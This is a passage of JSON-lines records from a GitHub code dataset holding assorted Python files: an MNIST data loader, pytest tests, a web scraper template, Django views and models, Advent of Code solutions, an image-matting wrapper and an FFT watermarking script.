False\n","repo_name":"typinghare/ucas-algorithm","sub_path":"review/code/Greedy_OJ_1.py","file_name":"Greedy_OJ_1.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"37951760685","text":"import urllib.request\nimport gzip\nimport pickle\nimport os\nimport numpy as np\nfrom PIL import Image\n\n\ndataset_dir = os.path.dirname(os.path.abspath(__file__))\nsave_file = dataset_dir + \"/mnist.pkl\"\nurl_base = 'http://yann.lecun.com/exdb/mnist/'\ndata_file = {\n 'train_img':'train-images-idx3-ubyte.gz',\n 'test_img':'t10k-images-idx3-ubyte.gz',\n}\nlable_file = {\n 'train_label':'train-labels-idx1-ubyte.gz',\n 'test_label':'t10k-labels-idx1-ubyte.gz' \n}\n\ndef _download_data(file_name):\n print(f\"File url: {url_base + file_name}\")\n file_path = dataset_dir + \"/\" + file_name \n urllib.request.urlretrieve(url_base + file_name, file_path)\n print(f\"Download file: {file_path}\")\n \ndef _convert_data(file_name, dtype='data', img_size=784):\n file_path = dataset_dir + \"/\" + file_name\n print(f\"Converting file {file_path} to Numpy array\")\n \n with gzip.open(file_path, 'rb') as f:\n if dtype == 'lable':\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n elif dtype == 'data':\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, img_size)\n \n return data\n\ndef _init_data():\n data_set = {}\n \n for name, file in data_file.items():\n _download_data(file)\n data_set[name] = _convert_data(file, dtype='data')\n for name, file in lable_file.items():\n _download_data(file)\n data_set[name] = _convert_data(file, dtype='lable')\n \n with open(save_file, 'wb') as f:\n pickle.dump(data_set, f, -1)\n print(f\"Save data set: {save_file}\")\n \ndef get_data():\n if not os.path.exists(save_file):\n _init_data()\n\n with open(save_file, 'rb') as f:\n dataset = pickle.load(f)\n \n return dataset\n\ndef one_hot_label(lable_int):\n mat = np.zeros((lable_int.size, 10))\n for idx, row in enumerate(mat):\n row[lable_int[idx]] = 1\n\n return mat\n\ndef reshape_data(data):\n data = data.reshape(-1, 28, 28)\n\n return data\n\ndef img_show(img):\n pil_img = Image.fromarray(np.uint8(img))\n pil_img.show()","repo_name":"ChiouBen/LeNet-practice","sub_path":"utils/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5879388518","text":"import load\nimport pytest\nfrom etl_exceptions import CannotCreateFilePath\nimport os\nfrom unittest.mock import patch\nimport 
pyarrow.parquet\n\n\n\n@patch('os.makedirs')\ndef test_create_full_path_ok(mock_makedirs):\n loader = load.APILoader(data=None,\n header=None,\n path='./output/wind',\n partition='partition1/partition2')\n result = loader.create_full_path('file.txt')\n expected = './output/wind/partition1/partition2/file.txt'\n assert result == expected\n mock_makedirs.assert_called()\n\n\ndef test_create_full_path_no_path_throws_exception():\n loader = load.APILoader(data=None,\n header=None,\n path=None,\n partition='partition1/partition2')\n with pytest.raises(CannotCreateFilePath):\n loader.create_full_path('file.txt')\n\n\n@patch('os.makedirs')\n@patch('pyarrow.parquet.write_table')\ndef test_create_file_ok(mock_makedirs, mock_parquet):\n loader = load.APILoader(data=[[1,2], [3,4]],\n header=[1,2],\n path='./test/1',\n partition='partition1/partition2')\n mock_parquet.assert_called()\n mock_makedirs.assert_called()\n\n\n@patch('os.makedirs')\ndef test_create_file_wrong_header_throws_exception(mock_makedirs):\n with pytest.raises(ValueError):\n loader = load.APILoader(data=[[1,2], [3,4]],\n header=[2], # Note that the header should have 2 columns\n path='./test/1',\n partition='partition1/partition2')\n\n","repo_name":"josemrsantos/trailstone","sub_path":"etl/tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26412699207","text":"import os\nimport pandas as pd \nimport pickle\n#INCOMPLETE\npath = \"C:\\\\Users\\\\supraja\\\\source\\\\repos\\\\DjangoWebProject1\\\\DjangoWebProject1\\\\pyt_Files\\\\log_Files\\\\\" #path to uploaded csv file along with file name\nsubpath = 'C:\\\\Users\\\\supraja\\\\source\\\\repos\\\\DjangoWebProject1\\\\DjangoWebProject1\\\\pyt_Files\\\\pdf_Files\\\\' #path to output folder without file name\n\n\ndef loadCsv(file_path):\n global path\n global subpath\n data_files = dict()\n\n data_files['data_file'] = pd.read_csv(file_path, encoding='latin-1')\n\n with open(os.path.join(subpath,'data_files_dict.txt'), 'wb') as handle:\n pickle.dump(data_files, handle)\n\n with open(os.path.join(subpath,'data_files_dict.txt'), 'rb') as handle:\n dic = pickle.loads(handle.read())","repo_name":"udayagirisupraja/DjangoWebProject1","sub_path":"DjangoWebProject1/app/py_Files/Load_CSV.py","file_name":"Load_CSV.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8445949709","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport os\nfrom PIL import Image\nimport pytesseract\nimport cv2\nfrom matplotlib import pyplot as plt\nimport shutil\nimport glob\n\n\nlist_name=[]\nroot_dir = \"/media/tang/lzp/whu_buildings\" #输入根目录,在此根目录下将会存放不同分类的图像文件夹\n\n\ndef estimate(imgname):\n img = cv2.imread(imgname,0)\n # ret,thresh = cv2.threshold(img,0,230,cv2.THRESH_BINARY)\n height,width = img.shape\n # print(height,width)\n size = img.size\n # print(\"size:\"+ str(size))\n non_black_num = cv2.countNonZero(img)\n result = non_black_num/size\n # print(\"白色占比:\"+str(result))\n return result\n\ndef makenewdir(dirname):\n if not os.path.exists(dirname):\n os.mkdir(dirname)\n\ndef my_move(srcfn, dstdir): ##定义移动函数,参数为待移动的文件路径和目标目录\n if not os.path.isfile(srcfn): ##判断文件是否存在\n print('srcfn error')\n\n else:\n srcdir, fn = os.path.split(srcfn) ##分离绝对路径和相对路径,获得文件名\n\n if not os.path.exists(dstdir): ##如果目录不存在,创建目录\n os.makedirs(dstdir)\n\n dstfn = dstdir + fn 
##生成目录下的文件名\n shutil.copyfile(srcfn, dstfn) ##复制\n\n\ndef get_common_name(path):\n filelist = os.listdir(path)\n common_name_flag = ''\n common_name_max = 0\n for file in filelist:\n\n Olddir = os.path.join(path, file) # 原来的文件路径\n if os.path.isdir(Olddir): # 如果是文件夹则进入文件夹内处理,进行递归,达到处理子文件夹内全部文件的目的\n # print(Olddir)\n get_common_name(Olddir)\n # continue\n else:\n # fns2 = glob.glob(path + '/*_1_label.png') ##获取当前目录下所有2.png格式的文件\n\n filename = os.path.splitext(file)[0] # 分离文件名与扩展名;得到文件名\n # print(filename)\n\n filetype = os.path.splitext(file)[1] # 文件扩展名(本例中是.png)\n # print(filetype)\n filepath = os.path.join(path, filename + filetype)\n # print(filepath)\n common_name = filename #适用于WHU\n if not common_name in list_name:\n list_name.append(common_name)\n # print(\"common name is \" + common_name)\n\n # print(list_name)\n return list_name\n\n\ndef classify(img_path,label_path):\n\n for name in list_name:\n # print(name)\n\n fns = glob.glob(img_path + '/'+ name +'.png')\n fns_label = glob.glob(label_path+'/' + name + '.png')\n\n img_percent = estimate(fns_label[0])\n if img_percent < 0.05:\n dst_dir = os.path.join(root_dir, 'less') # 存放目标存在20%以内的图片\n # print(dst_dir)\n #elif img_percent < 0.5:\n #dst_dir = os.path.join(root_dir, '20--50') # 存放目标存在20%以内的图片\n #elif img_percent < 0.7:\n #dst_dir = os.path.join(root_dir,'50--70')\n else:\n dst_dir = os.path.join(root_dir,'more')\n\n\n\n\n for img_name in fns:\n dst_dir_img = os.path.join(dst_dir,'images','train/')\n print(img_name+\" move to : \"+dst_dir_img)\n my_move(img_name,dst_dir_img)\n\n for img_name in fns_label:\n dst_dir_gt = os.path.join(dst_dir, 'gt', 'train/')\n print(img_name + \" move to : \"+dst_dir_gt)\n my_move(img_name,dst_dir_gt)\n\n\n\n return 0\n\nif __name__ == '__main__':\n label_path = os.path.join(root_dir,'gt','train')#输入存放label图像的文件路径\n img_path = os.path.join(root_dir,'images','train') #输入存放原图的文件路径\n get_common_name(label_path)\n classify(img_path,label_path)\n # move_all(\".\\\\gaofen_small\")\n","repo_name":"zpl99/GaofenCD_Solution","sub_path":"tools/classify_WHU.py","file_name":"classify_WHU.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"38223442621","text":"from aredis_om import get_redis_connection\nfrom sanic import Blueprint\nfrom sanic import response, HTTPResponse, Request\nfrom models import RatingHistory\nfrom functools import reduce\nfrom config import received_rating_topic\nimport json\n\nbp = Blueprint(\"Rating\", url_prefix=\"/ratings\")\nclient = get_redis_connection()\n\n\n@bp.get('/')\nasync def get_rating_by_id(request: Request, target_id: str) -> HTTPResponse:\n rating_list = RatingHistory.find(RatingHistory.target_id == target_id).all()\n size = len(rating_list)\n if size == 0:\n return response.json({'rating': 0.0})\n rating_num_list = [r.rate for r in rating_list]\n sum = reduce(lambda a, b: a + b, rating_num_list)\n result = sum / size\n return response.json({'rating': result})\n\n\n@bp.post('/')\nasync def add_rating(request: Request) -> HTTPResponse:\n body = request.json\n print(body)\n await client.publish(received_rating_topic, json.dumps(body, default=str))\n return response.empty(status=201)\n","repo_name":"marttp/emp-friendly","sub_path":"backend/rating/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17501490301","text":"# A Web scraper 
template\n# Gets HTML code from a series of pages\n# and finds elements using jQuery selectors\n\nimport os, re, codecs, subprocess, time, random\nfrom datetime import datetime\n\nimport requests\nfrom pyquery import PyQuery as pq\n\n# pip install requests pyquery\n\n\ndef process_url(url):\n text = ''\n \n try:\n r = requests.get(url, headers={'User-agent':'Magic Browser'})\n # content = r.content\n d = pq(r.text)\n \n links = d('.course-list-item .content h4 a')\n for i in range(links.length):\n link = links.eq(i)\n text += link.html().strip() + ' :: ' + link.attr.href + '\\n'\n \n # item_price = d('.product-price-box .price').eq(0).text()\n except Exception as ex:\n print('Error: ' + str(ex))\n text = str(ex)\n \n return text\n\n\ndef run():\n # use generated list of pages or a static urls list\n prefix = 'https://abc.net/forum?page='\n urls = [prefix+str(x) for x in range(1,101)]\n \n urls = [\n 'http://url-1.net',\n 'http://url-2.net',\n ]\n \n f = codecs.open('scrape_result.txt', 'w', 'utf-8')\n \n date_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n f.write('[{}]\\n'.format(date_str))\n \n print('total:', len(urls))\n for url in urls:\n print('URL: ' + url)\n text = process_url(url)\n f.write(text + '\\n')\n time.sleep(0.2)\n \n f.close()\n \n \n# ---\nrun()\n","repo_name":"mortalis13/PythonScripts","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25805805528","text":"\"\"\"Berries views module\"\"\"\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.routers import APIRootView\nfrom rest_framework.reverse import reverse\nfrom berries.api.berries_api import BerriesData\n\n\n# web navigation views\nclass BerryStatsView(APIView):\n \"Berry stats API root view\"\n\n def get(self, request, format=None):\n \"Return endpoint view\"\n berries = BerriesData()\n data = {\n \"berries_names\":berries.names_list(),\n \"min_growth_time\":berries.min_growth_time(),\n \"median_growth_time\":berries.median_growth_time(),\n \"max_growth_time\":berries.max_growth_time(),\n \"variance_growth_time\":berries.variance_growth_time(),\n \"mean_growth_time\":berries.mean_growth_time(),\n \"frequency_growth_times\":berries.frequency_growth_time(),\n }\n return Response(data)\n\nclass BerriesRootView(APIRootView):\n \"\"\"\n Berries API root view\n \"\"\"\n def get_view_name(self):\n return \"Berries\"\n\n def get(self, request, format=None):\n return Response({\n # register all api urls\n \"allBerryStats\": reverse(\"berries-api:stats\", request=request, format=format),\n })\n","repo_name":"contreraspablo9/PokeBerries","sub_path":"pokeberries/berries/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38636710188","text":"\ndef find_possible_sums_from_nums(nums):\n sums = set()\n for i in range(len(nums)):\n for j in range(i + 1, len(nums)):\n sums.add(nums[i] + nums[j])\n return sums\n\ndef find_weak_number(preamble_len, input):\n for i in range(preamble_len, len(input)):\n num = input[i]\n sums = find_possible_sums_from_nums(input[i - preamble_len:i])\n if num not in sums:\n return num\n\ndef find_encryption_weakness(weak_number, nums):\n prefix_sums = list(nums)\n prefix_sums.insert(0, 0)\n for i in range(1, len(nums)):\n prefix_sums[i] += prefix_sums[i 
- 1]\n\n for i in range(len(nums)):\n for j in range(i + 2, len(nums)):\n if prefix_sums[j] - prefix_sums[i] == weak_number:\n return nums[i:j]\n\nif __name__ == \"__main__\":\n with open(\"day_9/input.txt\") as fin:\n input = list(map(int, fin))\n\n # part 1\n weak_number = find_weak_number(25, input)\n print(weak_number)\n\n #part 2\n encryption_weakness = find_encryption_weakness(weak_number, input)\n print(min(encryption_weakness) + max(encryption_weakness))\n","repo_name":"maxpaulus43/adventofcode2020","sub_path":"day_9/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9643806708","text":"import torch\n\nfrom PIL import Image\nfrom torchvision.transforms import functional as F\n\nfrom . import transforms\nfrom .model.matting_net import MattingNet\n\n\nclass Matting:\n def __init__(self, checkpoint_path='', gpu=False):\n torch.set_flush_denormal(True) # flush cpu subnormal float.\n self.checkpoint_path = checkpoint_path\n self.gpu = gpu\n self.model = self.__load_model()\n\n def __load_model(self):\n model = MattingNet()\n if self.gpu and torch.cuda.is_available():\n model.cuda()\n else:\n model.cpu()\n\n # load checkpoint.\n checkpoint = torch.load(self.checkpoint_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n model.eval()\n return model\n\n def matting(self, image_path, with_img_trimap=False, net_img_size=-1, max_size=-1, trimap=None):\n \"\"\"\n :param trimap:\n :param image_path:\n :param with_img_trimap: return origin image and pred_trimap.\n :param net_img_size : resize to training size for better result. (resize <= 0 => no resize)\n :param max_size : max size for test. 
(max_size <= 0 => no resize)\n :return:\n pred_matte : shape: [H, w, 1 ] range: [0, 1]\n image : shape: [H, W, RGB(3) ] range: [0, 1]\n pred_trimap: shape: [H, w, 1 ] range: [0, 1]\n \"\"\"\n with torch.no_grad():\n image = self.__load_image_tensor(image_path, max_size)\n trimap_3 = self.__load_trimap_tensor(trimap, max_size)\n if self.gpu and torch.cuda.is_available():\n image = image.cuda()\n if trimap_3 is not None:\n trimap_3 = trimap_3.cuda()\n else:\n image = image.cpu()\n if trimap_3 is not None:\n trimap_3 = trimap_3.cpu()\n\n b, c, h, w = image.shape\n\n # resize to training size.\n if net_img_size > 0:\n resize_image = F.resize(image, [net_img_size, net_img_size], Image.BILINEAR)\n resize_trimap = None\n if trimap_3 is not None:\n resize_trimap = F.resize(trimap_3, [net_img_size, net_img_size], Image.BILINEAR)\n pred_matte, pred_trimap_prob, _ = self.model(resize_image, resize_trimap)\n pred_matte = F.resize(pred_matte, [h, w])\n pred_trimap_prob = F.resize(pred_trimap_prob, [h, w], Image.BILINEAR)\n else:\n pred_matte, pred_trimap_prob, _ = self.model(image, trimap_3)\n\n pred_matte = pred_matte.cpu().detach().squeeze(dim=0).numpy().transpose(1, 2, 0)\n image = image.cpu().detach().squeeze(dim=0).numpy().transpose(1, 2, 0)\n\n pred_trimap = pred_trimap_prob.squeeze(dim=0).softmax(dim=0).argmax(dim=0)\n pred_trimap = pred_trimap.cpu().detach().unsqueeze(dim=2).numpy() / 2.\n\n if not with_img_trimap:\n return pred_matte\n\n return pred_matte, image, pred_trimap\n\n @staticmethod\n def __load_image_tensor(image_path, max_size=-1):\n image = Image.open(image_path).convert('RGB')\n if max_size > 0:\n [image] = transforms.ResizeIfBiggerThan(max_size)([image])\n [image] = transforms.ToTensor()([image])\n image = image.unsqueeze(dim=0)\n return image\n\n def __load_trimap_tensor(self, trimap, max_size=-1):\n if trimap is None:\n return None\n # trimap = Image.open(trimap_path).convert('L')\n trimap = Image.fromarray(trimap).convert('L')\n\n if max_size > 0:\n [trimap] = transforms.ResizeIfBiggerThan(max_size)([trimap])\n [trimap] = transforms.ToTensor()([trimap])\n\n # get 3-channels trimap.\n trimap_3 = trimap.repeat(3, 1, 1)\n trimap_3[0, :, :] = (trimap_3[0, :, :] <= 0.1).float()\n trimap_3[1, :, :] = ((trimap_3[1, :, :] < 0.9) & (trimap_3[1, :, :] > 0.1)).float()\n trimap_3[2, :, :] = (trimap_3[2, :, :] >= 0.9).float()\n\n trimap_3 = trimap_3.unsqueeze(dim=0)\n return trimap_3\n","repo_name":"moiling/PortraitMatting-PyQt","sub_path":"algorithm/matte/matting.py","file_name":"matting.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10933981726","text":"# 版本号:1.0\n# 修改记录:2023/06/08 完成程序的主要功能:图像的分块FFT、加嵌水印、分块逆FFT\n# 作者:李铭辉\n# 联系方式:2011266@mail.nankai.edu.com\n\nimport sys\nimport random\n\ncmd = None\nseed = 2011266\nalpha = 100\nblock_size = 8\npath1 = None\npath2 = None\npath3 = None\n\nif __name__ == '__main__':\n if '-h' in sys.argv or '--help' in sys.argv or len(sys.argv) < 2:\n print('用法: python my_watermark.py [arg...] 
[opts...]')\n print(' 命令:')\n print(' encode ')\n print(' 图像 + 水印 -> 编码后的图像')\n print(' decode ')\n print(' 图像 + 编码后的图像 -> 水印')\n print(' 选项:')\n print(' --seed ,手动设置随机种子(默认为2011266)')\n print(' --blocksize ,手动设置块大小(默认为8)')\n print(' --alpha ,手动设置alpha值(默认为100)')\n sys.exit(1)\n cmd = sys.argv[1]\n if cmd != 'encode' and cmd != 'decode':\n print('错误的命令 %s' % cmd)\n sys.exit(1)\n if '--seed' in sys.argv:\n p = sys.argv.index('--seed')\n if len(sys.argv) <= p+1:\n print('缺少 --seed 后面的 ')\n sys.exit(1)\n seed = int(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if '--blocksize' in sys.argv:\n p = sys.argv.index('--blocksize')\n if len(sys.argv) <= p+1:\n print('缺少 --blocksize 后面的 ')\n sys.exit(1)\n block_size = int(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if '--alpha' in sys.argv:\n p = sys.argv.index('--alpha')\n if len(sys.argv) <= p+1:\n print('缺少 --alpha 后面的 ')\n sys.exit(1)\n alpha = float(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if cmd == 'encode':\n if len(sys.argv) < 4:\n print('缺少参数...')\n sys.exit(1)\n path1 = sys.argv[2]\n path2 = sys.argv[3]\n path3 = sys.argv[4]\n else:\n if len(sys.argv) < 3:\n print('缺少参数...')\n sys.exit(1)\n path1 = sys.argv[2]\n path2 = sys.argv[3]\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef fft_block(image):\n '''\n 对图像进行分块FFT\n '''\n blocks_h = image.shape[0] // block_size\n blocks_w = image.shape[1] // block_size\n fft_blocks = np.zeros(shape=((blocks_h, blocks_w, block_size, block_size)))\n fft_blocks = fft_blocks.astype(\"complex\")\n h_data = np.vsplit(image, blocks_h)\n for h in range(blocks_h):\n block_data = np.hsplit(h_data[h], blocks_w)\n for w in range(blocks_w):\n fft_blocks[h, w, ...] = np.fft.fft2(block_data[w])\n return fft_blocks\n\ndef embed(blocks, watermark):\n '''\n 将分块FFT的结果嵌入水印\n '''\n embed_blocks = blocks.copy()\n for h in range(watermark.shape[0]):\n for w in range(watermark.shape[1]):\n k = k1 if watermark[h, w] == 1 else k2\n for i in range(block_size):\n embed_blocks[h, w, i, block_size-1-i] = blocks[h, w, i, block_size-1-i] + alpha * k[i]\n for i in range(i, block_size-1):\n embed_blocks[h, w, block_size-i, 1+i] = blocks[h, w, block_size-i, 1+i] + alpha * k[i]\n return embed_blocks\n\ndef ifft_block(blocks):\n '''\n 对分块进行逆FFT得到图像\n '''\n row = None\n result = None\n h, w = blocks.shape[0], blocks.shape[1]\n for i in range(h):\n for j in range(w):\n block = np.fft.ifft2(blocks[i, j, ...]).real\n row = block if j == 0 else np.hstack((row, block))\n result = row if i == 0 else np.vstack((result, row))\n return result.astype(np.uint8)\n\ndef corr2(a, b):\n '''\n 计算两个数组的相关程度\n '''\n a = a - np.sum(a) / np.size(a)\n b = b - np.sum(b) / np.size(b)\n np.linalg.norm(b, 2)\n numerator = np.dot(a, b)\n denominator = (np.linalg.norm(a, 2) * np.linalg.norm(b, 2))\n if denominator != 0:\n r = numerator / denominator\n elif numerator > 0:\n r = float(\"-inf\")\n elif numerator < 0:\n r = float(\"inf\")\n elif numerator == 0:\n r = 0.0\n return r\n\ndef get_watermark(embed_U_image, watermark_size):\n '''\n 提取水印\n '''\n w_h, w_w = watermark_size\n extract_watermark = np.zeros(shape=watermark_size)\n extract_watermark.astype(np.uint8)\n fft_blocks = fft_block(embed_U_image)\n temp = np.zeros(block_size)\n temp = temp.astype(\"complex\")\n for h in range(w_h):\n for w in range(w_w):\n for i in range(block_size):\n temp[i] = fft_blocks[h, w, i, block_size-1-i]\n if corr2(temp, k1) > corr2(temp, k2):\n extract_watermark[h, w] = 255\n else:\n extract_watermark[h, w] = 0\n return 
extract_watermark.astype(np.uint8)\n\nif cmd == 'encode':\n image_path = path1\n watermark_path = path2\n embed_image_path = path3\n # 第一步、读取水印和图片\n\n\n watermark = cv2.imread(watermark_path, cv2.IMREAD_GRAYSCALE)\n watermark = np.where(watermark < np.mean(watermark), 0, 1)\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # 第二步、检查小块的边长是否合理\n i_h, i_w = image.shape[:2]\n if not(i_h % block_size == 0 and i_w % block_size == 0):\n print(\"图像的宽度或高度无法被小方块的边长整除!小方块的边长为 {:},原图的尺寸为 {:}!请重新选择小方块的边长!\".format(\n block_size, image.shape))\n sys.exit(1)\n # 第三步、调整水印的宽高\n watermark = cv2.resize(watermark, (i_w // block_size, i_h // block_size), interpolation=cv2.INTER_LINEAR_EXACT) # 重新设置水印的大小\n # 第四步、提取U层\n yuv_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n Y_image, U_image, V_image = yuv_image[..., 0], yuv_image[..., 1], yuv_image[..., 2]\n # 第五步、生成两个随机数组,用于编码\n np.random.seed(seed)\n k1 = np.random.randn(block_size)\n k2 = np.random.randn(block_size)\n # 第六步、对U层进行分块FFT\n fft_blocks = fft_block(U_image)\n # 第七步、嵌入水印\n embed_blocks = embed(fft_blocks, watermark)\n # 第八步、对分块进行逆FFT\n embed_U_image = ifft_block(embed_blocks)\n # 第九步、将U层放回,得到带水印的图像\n yuv_image[..., 1] = embed_U_image\n embed_image = cv2.cvtColor(yuv_image, cv2.COLOR_YUV2RGB)\n plt.imsave(embed_image_path, embed_image)\nelse:\n embed_image_path = path1\n extract_watermark_path = path2\n # 第一步、读取图片\n embed_image = cv2.imread(embed_image_path)\n embed_image = cv2.cvtColor(embed_image, cv2.COLOR_BGR2RGB)\n # 第二步、提取U层\n embed_U_image = cv2.cvtColor(embed_image, cv2.COLOR_RGB2YUV)[..., 1]\n # 第三步、检查小方块的边长是否合理\n i_h, i_w = embed_U_image.shape # 获取原图的大小\n if not(i_h % block_size == 0 and i_w % block_size == 0):\n print(\"图像的宽度或高度无法被小方块的边长整除!小方块的边长为 {:},原图的尺寸为 {:}!请重新选择小方块的边长!\".format(\n block_size, image.shape))\n sys.exit(1)\n # 第四步、生成两个随机数组,用于解码\n np.random.seed(seed)\n k1 = np.random.randn(block_size)\n k2 = np.random.randn(block_size)\n # 第五步、提取水印\n extract_watermark = get_watermark(embed_U_image, (i_h // block_size, i_w // block_size))\n # 第六步、保存提取的水印\n plt.imsave(extract_watermark_path, extract_watermark, cmap='gray')\n","repo_name":"BianLianYaoGuai/Watermark","sub_path":"my_watermark.py","file_name":"my_watermark.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19070830922","text":"input = open(\"day14_input.txt\")\ni = input.readline()[:-1]\n\nscan = [[\".\" * 600] for i in range(200)]\nsecond_scan = [[\".\" * 1500] for i in range(1500)]\nsand_bottom = 0\n\n# parsing\nwhile i:\n\tpairs = i.split(\" -> \")\n\told_pair = pairs[0].split(\",\")\n\tpairs = pairs[1:]\n\n\tfor pair in pairs:\n\t\tcoord = pair.split(\",\")\n\t\tsmallest_y = min(int(coord[1]), int(old_pair[1]))\n\t\tlargest_y = max(int(coord[1]), int(old_pair[1]))\n\t\tif(largest_y > sand_bottom):\n\t\t\tsand_bottom = largest_y\n\n\t\tif(smallest_y != largest_y):\n\t\t\tfor j in range(smallest_y, largest_y + 1):\n\t\t\t\tscan[j][0] = scan[j][0][:int(coord[0])] + \"#\" + scan[j][0][int(coord[0]) + 1:]\n\t\t\t\tsecond_scan[j][0] = second_scan[j][0][:int(coord[0])] + \"#\" + second_scan[j][0][int(coord[0]) + 1:]\n\n\t\tsmallest_x = min(int(coord[0]), int(old_pair[0]))\n\t\tlargest_x = max(int(coord[0]), int(old_pair[0]))\n\t\tif(smallest_x != largest_x):\n\t\t\tfor j in range(smallest_x, largest_x + 1):\n\t\t\t\tscan[int(coord[1])][0] = scan[int(coord[1])][0][:j] + \"#\" + scan[int(coord[1])][0][j + 1:]\n\t\t\t\tsecond_scan[int(coord[1])][0] 
= second_scan[int(coord[1])][0][:j] + \"#\" + second_scan[int(coord[1])][0][j + 1:]\n\t\t\n\t\told_pair = coord\n\n\ti = input.readline()[:-1]\n\nsand_count = 0\ni = 0\nj = 500\nwhile(True):\n\t# check for endless falling\n\tif(i >= sand_bottom):\n\t\tbreak\n\n\t# try to move down\n\tif(scan[i + 1][0][j] == \".\"):\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + left\n\telif(scan[i + 1][0][j - 1] == \".\"):\n\t\tj -= 1\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + right\n\telif(scan[i + 1][0][j + 1] == \".\"):\n\t\tj += 1\n\t\ti += 1\n\t\tcontinue\n\t# otherwise we have to stop\n\telse:\n\t\tsand_count += 1\n\t\tscan[i][0] = scan[i][0][:j] + \"#\" + scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\n# visualizing\n#[print(row[0][477:550]) for row in scan[0:175]]\n\n# part 1: \nprint(\"day14: solution for part 1: \" + str(sand_count))\n\nsand_count = 0\ni = 0\nj = 500\nwhile(True):\n\t# check for stop condition\n\tif(second_scan[0][0][500] == \"#\"):\n\t\tbreak\n\t# check for collision with floor\n\tif(i >= sand_bottom + 2):\n\t\tsecond_scan[i][0] = second_scan[i][0][:j] + \"#\" + second_scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\t# try to move down\n\tif(second_scan[i + 1][0][j] == \".\"):\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + left\n\telif(second_scan[i + 1][0][j - 1] == \".\"):\n\t\tj -= 1\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + right\n\telif(second_scan[i + 1][0][j + 1] == \".\"):\n\t\tj += 1\n\t\ti += 1\n\t\tcontinue\n\t# otherwise we have to stop\n\telse:\n\t\tsand_count += 1\n\t\tsecond_scan[i][0] = second_scan[i][0][:j] + \"#\" + second_scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\n# visualizing\n#[print(row[0][350:750]) for row in second_scan[0:179]]\n\n# part 2: \nprint(\"day14: solution for part 2: \" + str(sand_count))","repo_name":"Simonolsson98/AdventOfCode","sub_path":"2022/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31405045817","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\n\n\n# Create your models here.\nclass Like(models.Model):\n\n object_id = models.PositiveIntegerField() # tweet_id or comment_id\n content_type = models.ForeignKey(\n ContentType,\n on_delete=models.SET_NULL,\n null=True,\n )\n content_object = GenericForeignKey('content_type', 'object_id')\n\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\n ('user', 'content_type', 'object_id'),\n )\n\n # 按照时间排序某个被like的content_object的所有的list\n index_together = (\n ('content_type', 'object_id', 'created_at'),\n )\n\n def __str__(self):\n return '{} - {} liked {} {}'.format(\n self.created_at,\n self.user,\n self.content_type,\n self.object_id,\n )\n","repo_name":"WilburZjh/react-django-project","sub_path":"django_backend/likes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14508375809","text":"\"\"\"v0.1.0-add-token-fields\n\nRevision ID: a51236f82a74\nRevises: a13532f366ab\nCreate Date: 2023-03-05 19:01:03.264159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = 
